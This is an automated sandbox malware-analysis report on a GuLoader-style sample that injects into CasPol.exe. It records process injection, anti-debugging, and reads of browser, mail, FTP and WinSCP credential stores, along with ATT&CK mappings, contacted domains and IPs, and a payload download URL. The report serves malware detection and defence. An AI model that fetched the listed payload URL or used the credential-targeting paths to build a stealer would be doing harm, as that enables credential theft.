          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0116BB60 LdrInitializeThunk,5_2_0116BB60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: D00000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\SysWOW64\secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\9TpV4rfMmJ.exe" Jump to behavior
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\9TpV4rfMmJ.exe" Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeCode function: 2_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040352D

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000005.00000002.255513838667.000000001DEE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1264, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: Yara matchFile source: 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1264, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000005.00000002.255513838667.000000001DEE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1264, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts211
          Windows Management Instrumentation
          11
          DLL Side-Loading
          11
          DLL Side-Loading
          1
          Disable or Modify Tools
          2
          OS Credential Dumping
          2
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium1
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Native API
          Boot or Logon Initialization Scripts1
          Access Token Manipulation
          1
          Deobfuscate/Decode Files or Information
          1
          Credentials in Registry
          117
          System Information Discovery
          Remote Desktop Protocol2
          Data from Local System
          Exfiltration Over Bluetooth21
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)111
          Process Injection
          2
          Obfuscated Files or Information
          Security Account Manager1
          Query Registry
          SMB/Windows Admin Shares1
          Email Collection
          Automated Exfiltration1
          Non-Standard Port
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Timestomp
          NTDS421
          Security Software Discovery
          Distributed Component Object Model1
          Clipboard Data
          Scheduled Transfer2
          Non-Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
          DLL Side-Loading
          LSA Secrets1
          Process Discovery
          SSHKeyloggingData Transfer Size Limits123
          Application Layer Protocol
          Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common351
          Virtualization/Sandbox Evasion
          Cached Domain Credentials351
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Access Token Manipulation
          DCSync1
          Application Window Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job111
          Process Injection
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562499 Sample: 9TpV4rfMmJ.exe Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 26 www.konutmarket.com 2->26 28 mail.restaurantsllado.com 2->28 30 konutmarket.com 2->30 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 4 other signatures 2->42 8 9TpV4rfMmJ.exe 20 2->8         started        signatures3 process4 file5 20 C:\Users\user\AppData\Local\...\sxsstore.dll, PE32 8->20 dropped 22 C:\Users\user\AppData\Local\...\secur32.dll, PE32 8->22 dropped 24 C:\Users\user\AppData\Local\...\System.dll, PE32 8->24 dropped 44 Writes to foreign memory regions 8->44 46 Tries to detect Any.run 8->46 48 Hides threads from debuggers 8->48 12 CasPol.exe 11 8->12         started        16 CasPol.exe 8->16         started        signatures6 process7 dnsIp8 32 konutmarket.com 178.18.206.58, 443, 49803 VARGONENTR Turkey 12->32 34 mail.restaurantsllado.com 46.16.58.183, 49830, 587 CDMONsistemescdmoncomES Spain 12->34 50 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->50 52 Tries to steal Mail credentials (via file / registry access) 12->52 54 Tries to harvest and steal ftp login credentials 12->54 60 4 other signatures 12->60 18 conhost.exe 12->18         started        56 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->56 58 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 16->58 signatures9 process10

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          9TpV4rfMmJ.exe16%VirustotalBrowse
          9TpV4rfMmJ.exe25%ReversingLabsWin32.Downloader.GuLoader
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\secur32.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\secur32.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\sxsstore.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\sxsstore.dll0%ReversingLabs
          No Antivirus matches
          SourceDetectionScannerLabelLink
          konutmarket.com0%VirustotalBrowse
          www.konutmarket.com0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
          http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%VirustotalBrowse
          http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%Avira URL Cloudsafe
          http://www.certplus.com/CRL/class3.crl00%VirustotalBrowse
          http://www.certplus.com/CRL/class3.crl00%Avira URL Cloudsafe
          http://www.e-me.lv/repository01%VirustotalBrowse
          http://www.e-me.lv/repository00%Avira URL Cloudsafe
          http://www.acabogacia.org/doc00%Avira URL Cloudsafe
          http://crl.chambersign.org/chambersroot.crl00%Avira URL Cloudsafe
          http://56m2xdVSH4U.com0%Avira URL Cloudsafe
          http://ocsp.suscerte.gob.ve00%Avira URL Cloudsafe
          http://www.postsignum.cz/crl/psrootqca2.crl020%Avira URL Cloudsafe
          http://crl.dhimyotis.com/certignarootca.crl00%Avira URL Cloudsafe
          http://www.chambersign.org10%Avira URL Cloudsafe
          https://www.konutmarket.com/2022file_izNuHdosu25.binI0%Avira URL Cloudsafe
          http://www.pkioverheid.nl/policies/root-policy00%Avira URL Cloudsafe
          http://www.suscerte.gob.ve/lcr0#0%Avira URL Cloudsafe
          https://www.konutmarket.com/0%Avira URL Cloudsafe
          http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz00%Avira URL Cloudsafe
          http://crl.ssc.lt/root-c/cacrl.crl00%Avira URL Cloudsafe
          http://postsignum.ttc.cz/crl/psrootqca2.crl00%Avira URL Cloudsafe
          http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%Avira URL Cloudsafe
          http://ca.disig.sk/ca/crl/ca_disig.crl00%Avira URL Cloudsafe
          http://crl1.comsign.co.il/crl/comsignglobalrootca.crl00%Avira URL Cloudsafe
          http://www.certplus.com/CRL/class3P.crl00%Avira URL Cloudsafe
          http://www.suscerte.gob.ve/dpc00%Avira URL Cloudsafe
          http://www.certplus.com/CRL/class2.crl00%Avira URL Cloudsafe
          http://www.disig.sk/ca/crl/ca_disig.crl00%Avira URL Cloudsafe
          http://www.defence.gov.au/pki00%Avira URL Cloudsafe
          http://www.sk.ee/cps/00%Avira URL Cloudsafe
          http://www.globaltrust.info0=0%Avira URL Cloudsafe
          http://cps.root-x1.letsencrypt.org00%Avira URL Cloudsafe
          http://policy.camerfirma.com00%Avira URL Cloudsafe
          http://www.ssc.lt/cps030%Avira URL Cloudsafe
          http://ocsp.pki.gva.es00%Avira URL Cloudsafe
          http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?0%Avira URL Cloudsafe
          http://ca.mtin.es/mtin/ocsp00%Avira URL Cloudsafe
          http://cps.letsencrypt.org00%Avira URL Cloudsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
          http://crl.ssc.lt/root-b/cacrl.crl00%Avira URL Cloudsafe
          http://web.ncdc.gov.sa/crl/nrcacomb1.crl00%Avira URL Cloudsafe
          http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G0%Avira URL Cloudsafe
          https://wwww.certigna.fr/autorites/0m0%Avira URL Cloudsafe
          http://www.dnie.es/dpc00%Avira URL Cloudsafe
          http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf00%Avira URL Cloudsafe
          http://ca.mtin.es/mtin/DPCyPoliticas00%Avira URL Cloudsafe
          http://www.globaltrust.info00%Avira URL Cloudsafe
          http://www.certplus.com/CRL/class3TS.crl00%Avira URL Cloudsafe
          http://ac.economia.gob.mx/last.crl0G0%Avira URL Cloudsafe
          https://www.catcert.net/verarrel0%Avira URL Cloudsafe
          http://www.disig.sk/ca0f0%Avira URL Cloudsafe
          http://www.sk.ee/juur/crl/00%Avira URL Cloudsafe
          http://crl.chambersign.org/chambersignroot.crl00%Avira URL Cloudsafe
          http://crl.xrampsecurity.com/XGCA.crl00%Avira URL Cloudsafe
          http://certs.oati.net/repository/OATICA2.crl00%Avira URL Cloudsafe
          http://crl.oces.trust2408.com/oces.crl00%Avira URL Cloudsafe
          http://www.quovadis.bm00%Avira URL Cloudsafe
          http://crl.ssc.lt/root-a/cacrl.crl00%Avira URL Cloudsafe
          http://certs.oaticerts.com/repository/OATICA2.crl0%Avira URL Cloudsafe
          http://www.trustdst.com/certificates/policy/ACES-index.html00%Avira URL Cloudsafe
          http://certs.oati.net/repository/OATICA2.crt00%Avira URL Cloudsafe
          http://www.accv.es000%Avira URL Cloudsafe
          http://www.pkioverheid.nl/policies/root-policy-G200%Avira URL Cloudsafe
          https://www.netlock.net/docs0%Avira URL Cloudsafe
          http://www.e-trust.be/CPS/QNcerts0%Avira URL Cloudsafe
          http://ocsp.ncdc.gov.sa00%Avira URL Cloudsafe
          http://fedir.comsign.co.il/crl/ComSignCA.crl00%Avira URL Cloudsafe
          http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl00%Avira URL Cloudsafe
          http://web.ncdc.gov.sa/crl/nrcaparta1.crl0%Avira URL Cloudsafe
          http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;0%Avira URL Cloudsafe
          https://repository.luxtrust.lu00%Avira URL Cloudsafe
          http://cps.chambersign.org/cps/chambersroot.html00%Avira URL Cloudsafe
          http://www.acabogacia.org00%Avira URL Cloudsafe
          http://www.uce.gub.uy/acrn/acrn.crl00%Avira URL Cloudsafe
          https://www.konutmarket.com/(0%Avira URL Cloudsafe
          http://crl.securetrust.com/SGCA.crl00%Avira URL Cloudsafe
          http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt00%Avira URL Cloudsafe
          http://xMIMbL.com0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          konutmarket.com
          178.18.206.58
          truetrueunknown
          mail.restaurantsllado.com
          46.16.58.183
          truetrue
            unknown
            www.konutmarket.com
            unknown
            unknowntrueunknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://127.0.0.1:HTTP/1.1CasPol.exe, 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            low
            http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0CasPol.exe, 00000005.00000003.252863877116.0000000021420000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.certplus.com/CRL/class3.crl0CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.252863954723.0000000021435000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.e-me.lv/repository0CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251764746889.00000000214A1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.acabogacia.org/doc0CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://crl.chambersign.org/chambersroot.crl0CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://56m2xdVSH4U.comCasPol.exe, 00000005.00000002.255513838667.000000001DEE8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255514591824.000000001DF91000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://ocsp.suscerte.gob.ve0CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.postsignum.cz/crl/psrootqca2.crl02CasPol.exe, 00000005.00000003.251767682453.0000000021447000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://crl.dhimyotis.com/certignarootca.crl0CasPol.exe, 00000005.00000002.255522691089.000000002148F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768056928.000000002148F000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://www.chambersign.org1CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.konutmarket.com/2022file_izNuHdosu25.binICasPol.exe, 00000005.00000002.255488160854.0000000000E95000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.pkioverheid.nl/policies/root-policy0CasPol.exe, 00000005.00000003.251767179293.000000002144D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.252863163502.0000000021459000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://repository.swisssign.com/0CasPol.exe, 00000005.00000003.251767179293.000000002144D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://www.suscerte.gob.ve/lcr0#CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://www.konutmarket.com/CasPol.exe, 00000005.00000003.251683839425.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255488312809.0000000000EB6000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://crl.ssc.lt/root-c/cacrl.crl0CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://postsignum.ttc.cz/crl/psrootqca2.crl0CasPol.exe, 00000005.00000003.251767682453.0000000021447000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlCasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://ca.disig.sk/ca/crl/ca_disig.crl0CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768708098.0000000021437000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.certplus.com/CRL/class3P.crl0CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.suscerte.gob.ve/dpc0CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.certeurope.fr/reference/root2.crl0CasPol.exe, 00000005.00000003.252863877116.0000000021420000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.certplus.com/CRL/class2.crl0CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.disig.sk/ca/crl/ca_disig.crl0CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://eca.hinet.net/repository/Certs/IssuedToThisCA.p7b05CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.defence.gov.au/pki0CasPol.exe, 00000005.00000003.251767179293.000000002144D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.252863163502.0000000021459000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.sk.ee/cps/0CasPol.exe, 00000005.00000003.251765191340.000000002147C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.globaltrust.info0=CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://www.anf.esCasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09CasPol.exe, 00000005.00000003.251767682453.0000000021447000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://pki.registradores.org/normativa/index.htm0CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://cps.root-x1.letsencrypt.org0CasPol.exe, 00000005.00000002.255514393280.000000001DF65000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251753818478.000000002017E000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255521171417.000000002013F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255521466779.000000002017F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255488160854.0000000000E95000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://policy.camerfirma.com0CasPol.exe, 00000005.00000002.255522651765.0000000021479000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.ssc.lt/cps03CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251765191340.000000002147C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://ocsp.pki.gva.es0CasPol.exe, 00000005.00000003.251768856245.000000002144A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251767682453.0000000021447000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.anf.es/es/address-direccion.htmlCasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://www.anf.es/address/)1(0&CasPol.exe, 00000005.00000003.251769224606.000000002019A000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?CasPol.exe, 00000005.00000003.251769019527.0000000021446000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768708098.0000000021437000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
